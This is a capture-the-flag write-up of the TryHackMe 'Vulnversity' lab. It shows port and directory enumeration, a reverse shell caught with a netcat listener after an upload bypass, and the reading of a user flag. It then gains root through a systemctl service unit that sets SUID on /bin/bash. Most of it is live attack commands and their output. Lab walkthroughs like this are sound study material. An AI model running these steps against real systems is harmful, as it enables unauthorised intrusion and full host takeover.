Professional Documents
Culture Documents
Esharmaji Walkthrough Vulniversity
Esharmaji Walkthrough Vulniversity
Enumeration:
nmap -sC -sV 10.10.170.189 -oN initial
(root EthicalSharmaji)-[~/THMOSCPPath/vulnuniv]
└─# gobuster dir -u http://10.10.170.189:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-
medium.txt -o gobust.txt
1/6
.php extension is not working. Hence, tested for other extensions found on google.
2/6
File uploaded successfully. Enumerated for file upload directory and it was successfully found in /
internal/uploads.
──(root EthicalSharmaji)-[~/THMOSCPPath/vulnuniv]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [10.17.41.167] from (UNKNOWN) [10.10.170.189] 45306
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64
3/6
x86_64 x86_64 GNU/Linux
13:20:27 up 1:41, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ ls -al
total 96
drwxr-xr-x 23 root root 4096 Jul 31 2019 .
drwxr-xr-x 23 root root 4096 Jul 31 2019 ..
drwxr-xr-x 2 root root 4096 Jul 31 2019 bin
drwxr-xr-x 3 root root 4096 Jul 31 2019 boot
drwxr-xr-x 17 root root 3700 Mar 16 11:39 dev
drwxr-xr-x 98 root root 4096 Aug 1 2019 etc
drwxr-xr-x 3 root root 4096 Jul 31 2019 home
lrwxrwxrwx 1 root root 33 Jul 31 2019 initrd.img -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x 22 root root 4096 Jul 31 2019 lib
drwxr-xr-x 2 root root 4096 Jul 31 2019 lib64
drwx------ 2 root root 16384 Jul 31 2019 lost+found
drwxr-xr-x 3 root root 4096 Jul 31 2019 media
drwxr-xr-x 2 root root 4096 Feb 26 2019 mnt
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
dr-xr-xr-x 137 root root 0 Mar 16 11:38 proc
drwx------ 4 root root 4096 Jul 31 2019 root
drwxr-xr-x 28 root root 980 Mar 16 11:39 run
drwxr-xr-x 2 root root 12288 Jul 31 2019 sbin
drwxr-xr-x 2 root root 4096 Jul 31 2019 snap
drwxr-xr-x 3 root root 4096 Jul 31 2019 srv
dr-xr-xr-x 13 root root 0 Mar 16 11:38 sys
drwxrwxrwt 8 root root 4096 Mar 16 13:17 tmp
drwxr-xr-x 10 root root 4096 Jul 31 2019 usr
drwxr-xr-x 14 root root 4096 Jul 31 2019 var
lrwxrwxrwx 1 root root 30 Jul 31 2019 vmlinuz -> boot/vmlinuz-4.4.0-142-generic
$ cd /home
$ ls
bill
$ cd bill
$ ls
user.txt
$ whoami && cat user.txt && ifconfig
www-data
8bd7992fbe8a6ad*****(Intentionally * added)
eth0 Link encap:Ethernet HWaddr 02:5e:bb:59:0d:97
inet addr:10.10.170.189 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::5e:bbff:fe59:d97/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:96350 errors:0 dropped:0 overruns:0 frame:0
TX packets:94946 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6669760 (6.6 MB) TX bytes:24660136 (24.6 MB)
Privilege Escalation:
$ uname -a
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64
x86_64 x86_64 GNU/Linux
https://gtfobins.github.io/gtfobins/systemctl/
www-data@vulnuniversity:/home/bill$ TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TFTF=$(mktemp).service
www-data@vulnuniversity:/home/bill$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "chmod +s /bin/bash"
> [Install]
> WantedBy=multi-user.target' > $TF
5/6
www-data@vulnuniversity:/home/bill$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.gzegTgkVSR.service to /tmp/
tmp.gzegTgkVSR.service.
www-data@vulnuniversity:/home/bill$
/bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.gzegTgkVSR.service to /
tmp/tmp.gzegTgkVSR.service.
6/6